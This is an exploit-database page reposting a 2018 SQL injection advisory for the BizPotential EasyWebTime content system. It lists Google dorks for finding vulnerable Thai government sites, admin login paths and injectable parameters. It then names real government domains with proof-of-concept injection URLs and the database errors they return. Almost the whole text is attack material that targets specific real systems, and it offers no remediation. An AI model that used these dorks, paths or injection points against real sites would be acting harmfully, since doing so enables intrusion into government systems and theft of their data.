Advertisement






BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2018-09-10
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018090088

Below is a copy:

BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability
#################################################################################################

# Exploit Title : BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 10/09/2018
# Vendor Homepage : bizpotential.com ~ ewtadmin.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dorks : 

inurl:''/ewtadmin/'' site:go.th

inurl:''/main.php?filename='' site:go.th

inurl:''/ewtadmin/ewt/ccs/''

intext:'' Copyright 2007 - BizPotential.com - All Rights Reserved.''

intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved''

#################################################################################################

# Admin Control Panel Paths => 

/ewtadmin/index.php
/ewtadmin82/
/ewtcommittee/index2331.php
/ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php

# SQL Injection Exploit : 

/n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection]

/ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection]

/more_news.php?offset=[SQL Injection]

/more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection]


#################################################################################################

# Webboard Exploit : 

/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard

# Webboar Directory Path : 

/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard

ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard

#################################################################################################

# Example Site => 

Thailand Government Chachoengsao Cooperative Auditing Office 

cad.go.th/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1\%27&filename=webboard

cad.go.th/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard

ccs.cad.go.th/index_question.php?wcad=5&t=1&filename=webboard

#################################################################################################

Thailand Government Department of Mineral Sources 

# Example Sites => 

dmr.go.th/n_more3.php?page=0&c_id=199%27 => [ Proof of Concept ] => 

dmr.go.th/ewtadmin/ewt/dmr_web/n_more.php?c_id=556%27 => [ Proof of Concept ] =>  archive.is/bUcka

# SQL Database Error => 

SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y' ORDER BY n_date DESC LIMIT -20,20
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,20' at line 1

Thailand Government Office of Consumer Protection Board

#  ocpb.go.th/more_news.php?offset=-30&cid=&startoffset=-10%27 => [ Proof of Concept ] => archive.is/inA3o 

# SQL Database Error => 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30, 10' at line 3

Thailand Government Ministry of Culture and Cooperatives - Auditing Department

#  cad.go.th/cadweb_eng/ewt_w3c/more_news.php?offset=60%27 => [ Proof of Concept ] =>  archive.is/a4XYx

# SQL Database Error => 

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\WWW\ewtadmin\ewt\cadweb_eng\lib\function.php on line 101

SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve = 'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end) 
or (n_date_start = '' and n_date_end = '')) ORDER BY n_date DESC,n_timestamp DESC LIMIT 60\\\',20
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\',20' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.